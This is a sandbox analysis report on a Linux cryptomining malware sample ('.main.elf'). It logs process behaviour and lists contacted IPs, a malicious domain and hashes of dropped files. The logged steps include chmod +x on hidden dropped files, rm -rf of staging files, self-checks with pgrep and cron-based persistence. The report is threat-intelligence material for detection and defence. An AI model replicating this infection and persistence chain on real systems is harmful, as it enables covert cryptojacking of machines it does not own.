Source: /usr/bin/cat (PID: 6309)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /usr/bin/cat (PID: 6317)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /usr/bin/cat (PID: 6327)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /usr/bin/cat (PID: 6333)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior
Source: /usr/bin/cat (PID: 6342)	Directory: /var/tmp/.rcu_gp/.ps4	Jump to behavior

Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/6231/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/6231/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1582/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/3088/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/230/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/230/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/110/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/110/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/231/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/231/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/111/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/111/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/232/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/232/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1579/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/112/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/112/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/233/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/233/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1699/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/113/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/113/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/234/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/234/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1335/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1698/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/114/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/114/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/235/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/235/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1334/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1576/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/2302/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/115/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/115/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/236/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/236/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/116/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/116/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/237/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/237/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/117/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/117/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/118/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/118/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/910/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/910/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/119/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/119/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/912/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/912/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/10/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/10/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/2307/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/11/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/11/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/918/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/918/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/12/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/12/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/13/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/13/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/14/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/14/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/15/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/15/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/16/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/16/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/17/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/17/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/18/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/18/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1594/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/120/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/120/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/121/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/121/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1349/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/1/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/122/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/122/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/243/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/243/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/123/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/123/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/2/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/2/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/124/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/124/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/3/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/3/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/4/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6285)	File opened: /proc/4/cmdline	Jump to behavior

Source: /bin/bash (PID: 6239)	Chmod executable: /usr/bin/chmod -> chmod +x .report_system			Jump to behavior
Source: /bin/bash (PID: 6241)	Chmod executable: /usr/bin/chmod -> chmod +x /var/tmp/.rcu_gp/diicot			Jump to behavior

Source: /bin/bash (PID: 6243)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6259)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6287)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6302)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6313)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6323)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6331)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior
Source: /bin/bash (PID: 6339)	Grep executable: /usr/bin/grep -> grep -q .main	Jump to behavior

Source: /var/tmp/.rcu_gp/diicot (PID: 6256)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6285)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6300)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6311)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6319)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6329)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6335)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6344)	Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system	Jump to behavior

Source: /bin/bash (PID: 6244)	Rm executable: /usr/bin/rm -> rm -rf /var/tmp/.rcu_gp/.ps5			Jump to behavior
Source: /bin/bash (PID: 6253)	Rm executable: /usr/bin/rm -> rm -rf /var/tmp/.rcu_gp/.ps5			Jump to behavior

Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /bin/bash (PID: 6240)	Writes shell script file to disk with an unusual file extension: /tmp/sh-thd.QhlKa3			Jump to dropped file
Source: /usr/bin/cat (PID: 6240)	Writes shell script file to disk with an unusual file extension: /var/tmp/.rcu_gp/diicot			Jump to dropped file

Source: /bin/bash (PID: 6245)	Sleep executable: /usr/bin/sleep -> sleep 1	Jump to behavior
Source: /bin/bash (PID: 6248)	Sleep executable: /usr/bin/sleep -> sleep 1	Jump to behavior
Source: /bin/bash (PID: 6249)	Sleep executable: /usr/bin/sleep -> sleep 1	Jump to behavior
Source: /bin/bash (PID: 6251)	Sleep executable: /usr/bin/sleep -> sleep 1	Jump to behavior
Source: /bin/bash (PID: 6260)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior
Source: /bin/bash (PID: 6288)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior
Source: /bin/bash (PID: 6303)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior
Source: /bin/bash (PID: 6314)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior
Source: /bin/bash (PID: 6324)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior
Source: /bin/bash (PID: 6332)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior
Source: /bin/bash (PID: 6340)	Sleep executable: /usr/bin/sleep -> sleep 2.5	Jump to behavior

Source: /tmp/.main.elf (PID: 6231)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6231)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/.main.elf (PID: 6231)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6231)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wget (PID: 6233)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6255)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263)	Queries kernel information via 'uname':	Jump to behavior
Source: /sbin/modprobe (PID: 6270)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6284)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6299)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6310)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6318)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6328)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6334)	Queries kernel information via 'uname':	Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6343)	Queries kernel information via 'uname':	Jump to behavior

Linux Analysis Report .main.elf

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

Bitcoin Miner

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Linux Analysis Report
.main.elf

Malware Threat Intel
Provided by

IP	Domain	Country	ASN	ASN Name	Malicious
91.184.240.129	xkobeproxy.xkobeimparatu.net	Russian Federation	41745	IPNET-RUSSIA-ASRU	true
66.63.187.195	xkobeimparatu.net	United States	8100	ASN-QUADRANET-GLOBALUS	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

ID:	1545520
Product:	CloudBasic
Start time:	16:32:04
Start date:	30.10.2024
Sample:	.main.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	1b1445cab8443509f13769a3c479404f
SHA1:	9b1fcc3637f92d8fa281f7ab2243cb382f4be285
SHA256:	864a395c401c668ac8e23aa27eb4bc281e3734d4eafc29178174d79bae48a173
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 49.77%

Name	Type	MD5	SHA1	SHA256
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	ASCII text, with no line terminators	537D9B6C927223C796CAC288CCED29DF	EA10E810F96FCA6858E37FDA9832ACE147EED87C	0D21AE129A64E1D19E4A94DFCA3A67C777E17374E9D4CA2F74B65647A88119EA
/tmp/sh-thd.QhlKa3	Bourne-Again shell script, ASCII text executable	8BBAB4CB0D4871BF7665CBBE5C7DD305	6358FC05A9CA981197DAE3CC35C1F49CC61868EC	DBEB0BB0EED71ABAE7CABEEC6E3CBDA15E1883FB95E7C68C644FDF7EB4B23723
/var/spool/cron/crontabs/tmp.VYCskO	ASCII text	7622E08F62DEF5CA428032222390BD31	1DD387167034AE46821DE1F53A8967285BACA55E	BBA82E1481B450E2983989431885EAD98AD2EA6E96DBA2F78334EA2E0DF983D5
/var/tmp/.rcu_gp/.ps4	ASCII text	ED41F347E368587902EE39AE0820E4F3	55FC93606D1C801650FB68C85B4535658F44E51B	FADF3C99404046418D249ECA29C985B40BF34D6BB6000F32BB73F39E0D6E5016
/var/tmp/.rcu_gp/.ps5	ASCII text	FC16AD6D39C8C6669EA14E35610D398B	0644C85527D59857D780C26D9DB9C585066A9F1A	D1E064E763215D12123C8711C37A070A6BA95C9458C0F980A308FFBD00863493
/var/tmp/.rcu_gp/.report_system	ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers at 8825120	4D463A880BD40887452D5AF33FC61B84	FD82A5ABE038F6339FA20DE8FC9855198081D55B	3E6A45E25BDC8F06556A7BCB873ADD8EF0851FD886C2DAD742EFCF6F88EB5DB0
/var/tmp/.rcu_gp/diicot	Bourne-Again shell script, ASCII text executable	8BBAB4CB0D4871BF7665CBBE5C7DD305	6358FC05A9CA981197DAE3CC35C1F49CC61868EC	DBEB0BB0EED71ABAE7CABEEC6E3CBDA15E1883FB95E7C68C644FDF7EB4B23723